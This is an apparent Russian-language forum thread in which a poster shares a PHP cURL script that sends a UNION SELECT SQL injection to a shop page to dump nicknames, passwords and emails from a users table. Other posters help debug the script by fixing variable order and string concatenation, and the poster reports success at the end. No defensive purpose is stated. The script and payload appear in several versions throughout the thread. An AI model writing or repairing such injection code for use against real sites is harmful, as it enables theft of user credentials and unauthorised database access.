День добрый (надеюсь).Такая вот канитель:



<?php

$url = 'http://www.site.com/shop.php?st=2&movie=$request&id=676';
$limit = 0;
$ref = 'http://www.site.com/shop.php';
$request = '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25 from Portal.users limit+0,1/*';
$ua = 'Fuck all!!!';
$ch = curl_init();

curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_REFERER,$ref);
curl_setopt($ch,CURLOPT_HEADER,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_USERAGENT,$ua);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);
curl_setopt($ch,CURLOPT_COOKIEJAR,'./fuck');
curl_setopt($ch,CURLOPT_COOKIEFILE,'./fuck');
$result = curl_exec($ch);
curl_close($ch);
echo $result;



?>



Вроде посылаю правильно(опять-таки надеюсь).В чём может быть причина ? Проблем с получением самой страницы не возникает,но вот сам результат запроса(а он верный,уверяю вас,господа ))) ).Два варианта: либо я передал неправильно(GET запрос всё же),либо что-то ещё.

ЗЫ: Самого результат SQL запроса из бд в ответе невидно :(

ЗЫ2: Веля не тупой... Веля гуглил!(

вопще переменную , которая где то используется, нужно объявлять раньше того места


<?php
$request = '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25 from Portal.users limit+0,1/*';
$url = 'http://www.site.com/shop.php?st=2&movie=$request&id=676';
$limit = 0;
$ref = 'http://www.site.com/shop.php';
$ua = 'Fuck all!!!';
$ch = curl_init();

curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_REFERER,$ref);
curl_setopt($ch,CURLOPT_HEADER,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_USERAGENT,$ua);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);
curl_setopt($ch,CURLOPT_COOKIEJAR,'./fuck');
curl_setopt($ch,CURLOPT_COOKIEFILE,'./fuck');
$result = curl_exec($ch);
curl_close($ch);
echo $result;



?>

Всё равно не помогло (,но всё равно пасип )

А где строчка
curl_setopt($ch,CURLOPT_POSTFIELDS, $request);
?

Так это же не пост данные...оО

ЗЫ: Пробывал и так,и эдак...всё мимо.

$url = 'http://www.site.com/shop.php?st=2&movie=$request&id=676';
$limit = 0;
$ref = 'http://www.site.com/shop.php';
$request = '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25 from Portal.users limit+0,1/*';

Ну и на что ты надеешся? Одинарные скобки, переменная, которая объявлена позже ее вызова ..


$request = '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25 from Portal.users limit+0,1/*';
$url = 'http://www.site.com/shop.php?st=2&movie='.$request.'&id=676';
$limit = 0;
$ref = 'http://www.site.com/shop.php';

$url = 'http://www.site.com/shop.php?st=2&movie=-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25 from Portal.User limit 0,1/*&id=676';
$ref = 'http://www.site.com/shop.php';
$ua = 'Fuck you!!!';
$ch = curl_init();

...Тут код курлы...




CURLOPT_POSTFIELDS Убрал,так как данные гет.Зато теперь на экране красуется бэд рекьюст)

Пасиппи,помог разобраться b3:):):) Объявляю время отдыха и всеобщего празднества!)))